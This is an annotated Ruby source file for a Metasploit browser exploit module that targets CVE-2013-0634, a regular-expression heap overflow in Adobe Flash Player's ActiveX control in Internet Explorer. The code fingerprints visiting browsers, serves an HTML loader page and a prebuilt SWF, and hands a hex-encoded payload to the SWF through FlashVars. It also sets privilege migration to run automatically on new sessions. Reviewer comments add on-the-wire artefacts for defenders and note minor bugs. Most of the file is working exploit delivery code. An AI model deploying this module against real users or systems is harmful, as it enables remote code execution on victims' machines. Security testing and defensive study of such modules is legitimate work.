GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/adobe_flash_regex_value.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Browser-side delivery module for CVE-2013-0634 (Adobe Flash Player
# regular-expression heap overflow in the ActiveX control, Internet Explorer).
#
# The exploit trigger itself is a prebuilt SWF read from the framework data
# directory (see #create_swf); this class only fingerprints the visitor
# (BrowserRequirements), serves an HTML loader page and then the SWF, and
# hands the payload to the SWF as hex via FlashVars.
#
# Artefacts visible from this file alone that a defender can look for on the
# wire: a response with `Content-Type: application/x-shockwave-flash` and
# `Pragma: no-cache`, and a loader page whose FlashVars value is
# `his=` followed by a long lowercase hex string.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  # Provides the HTTP server, the browser fingerprinting driven by the
  # 'BrowserRequirements' metadata, and the #on_request_exploit callback
  # implemented below (presumably; the mixin is not part of this file).
  include Msf::Exploit::Remote::BrowserExploitServer

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] extra metadata merged in by update_info
  def initialize(info={})
    super(update_info(info,
      'Name' => "Adobe Flash Player Regular Expression Heap Overflow",
      'Description' => %q{
        This module exploits a vulnerability found in the ActiveX component of Adobe
        Flash Player before 11.5.502.149. By supplying a specially crafted swf file
        with special regex value, it is possible to trigger a memory corruption, which
        results in remote code execution under the context of the user, as exploited in
        the wild in February 2013. This module has been tested successfully with Adobe
        Flash Player 11.5 before 11.5.502.149 on Windows XP SP3 and Windows 7 SP1 before
        MS13-063, since it takes advantage of a predictable SharedUserData in order to
        leak ntdll and bypass ASLR.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Unknown', # malware sample
          'Boris "dukeBarman" Ryutin', # msf exploit
          'juan vazquez' # ActionScript deobfuscation and cleaning
        ],
      'References' =>
        [
          [ 'CVE', '2013-0634' ],
          [ 'OSVDB', '89936'],
          [ 'BID', '57787'],
          [ 'URL', 'http://malwaremustdie.blogspot.ru/2013/02/cve-2013-0634-this-ladyboyle-is-not.html' ],
          [ 'URL', 'http://malware.dontneedcoffee.com/2013/03/cve-2013-0634-adobe-flash-player.html' ],
          [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html' ],
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/adobe-patches-two-vulnerabilities-being-exploited-in-the-wild/' ],
          [ 'URL', 'http://eromang.zataz.com/tag/cve-2013-0634/' ]
        ],
      'Payload' =>
        {
          # Payload is capped at 1024 bytes and emitted without a NOP sled; it
          # travels to the SWF as a hex string (see #exploit_template).
          'Space' => 1024,
          'DisableNops' => true
        },
      'DefaultOptions' =>
        {
          # Run post/windows/manage/priv_migrate automatically on a new session.
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
          # One attempt per client (mixin option — presumably); the :tried flag
          # reset in #on_request_exploit exists to let the .swf request through.
          'Retries' => false
        },
      'Platform' => 'win',
      'BrowserRequirements' =>
        {
          # Accept fingerprints tagged 'script' or 'headers' (JS probe vs. HTTP
          # headers — presumably; the tag semantics belong to the mixin).
          :source => /script|headers/i,
          # Flash Player ActiveX control. Same CLSID as the <object classid> in
          # #exploit_template, so the loader is only sent where the probe saw it.
          :activex => [
            {
              clsid: "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
              method: "LoadMovie"
            }
          ],
          :os_name => OperatingSystems::Match::WINDOWS,
          :ua_name => Msf::HttpClients::IE,
          # Only 11.5.x builds below the fixed 11.5.502.149. NOTE(review): if ver
          # is a String, `<` is a lexicographic comparison rather than a numeric
          # version compare, so e.g. '11.5.502.99' is not treated as older than
          # '11.5.502.149' — the check is narrower than the description states.
          :flash => lambda { |ver| ver =~ /^11\.5/ && ver < '11.5.502.149' }
        },
      'Targets' =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged' => false,
      'DisclosureDate' => '2013-02-08',
      'DefaultTarget' => 0))
  end

  # Loads the prebuilt SWF once into @swf, then defers to the mixin's #exploit
  # (which starts the HTTP server — presumably).
  def exploit
    @swf = create_swf
    super
  end

  # Mixin callback for each request from a client that passed the
  # BrowserRequirements check. Two request kinds are served:
  #   * a URI ending in .swf -> the prebuilt SWF bytes held in @swf,
  #   * anything else        -> the HTML loader page from #exploit_template,
  #     whose <param name="movie"> points back at a random .swf URI.
  #
  # @param cli         [Object] client connection handle (mixin type)
  # @param request     [Object] parsed HTTP request; only #uri is used here
  # @param target_info [Hash]   fingerprint data passed through to get_payload
  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    # `$` anchors at end of line rather than end of string (`\z`); harmless for
    # a single-line URI, but worth knowing if this pattern is ever reused.
    if request.uri =~ /\.swf$/
      print_status("Sending SWF...")
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
      return
    end

    print_status("Sending HTML...")
    tag = retrieve_tag(cli, request)
    profile = browser_profile[tag]
    # Clear the per-client "tried" flag so the browser's follow-up request for
    # the .swf is still served rather than refused as a repeat attempt
    # (presumably; the flag is owned by the BrowserExploitServer mixin).
    profile[:tried] = false unless profile.nil?
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  # Builds the HTML loader page and the Binding used to render it (the
  # <%= %> tags are ERB, expanded by send_exploit_html — presumably).
  #
  # The page embeds the Flash ActiveX control (same CLSID as in
  # BrowserRequirements) with a randomly named .swf as the movie and passes the
  # hex-encoded payload through FlashVars as "his=<hex>"; the SWF is expected
  # to read it back from there (the SWF is not part of this file).
  # Note the <object ... /> tag is self-closed yet followed by <param> children
  # and </object>; not well-formed markup, though IE presumably tolerates it.
  #
  # @param cli         [Object] client handle, forwarded to get_payload
  # @param target_info [Hash]   fingerprint data, forwarded to get_payload
  # @return [Array(String, Binding)] the template and the binding to render it with
  def exploit_template(cli, target_info)

    # 4..6 random alpha characters so the SWF URI differs per page load.
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    # Payload bytes as a lowercase hex string (String#unpack "H*").
    shellcode = get_payload(cli, target_info).unpack("H*")[0]

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="his=<%=shellcode%>" />
    <param name="Play" value="true" />
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  # Reads the prebuilt exploit SWF from the framework data directory. That
  # file, not this module, carries the actual CVE-2013-0634 trigger.
  #
  # @return [String] raw SWF bytes (opened in binary mode)
  # @raise [Errno::ENOENT] if the data file is missing
  def create_swf
    path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2013-0634", "exploit.swf" )
    # The assignment inside the block is redundant: File.open with a block
    # returns the block's value (f.read), which is what the outer `swf =` keeps.
    swf = ::File.open(path, 'rb') { |f| swf = f.read }

    swf
  end
end